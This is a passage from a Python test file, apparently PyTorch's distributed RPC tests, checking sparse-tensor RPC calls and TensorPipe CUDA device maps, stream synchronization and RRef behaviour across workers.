)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
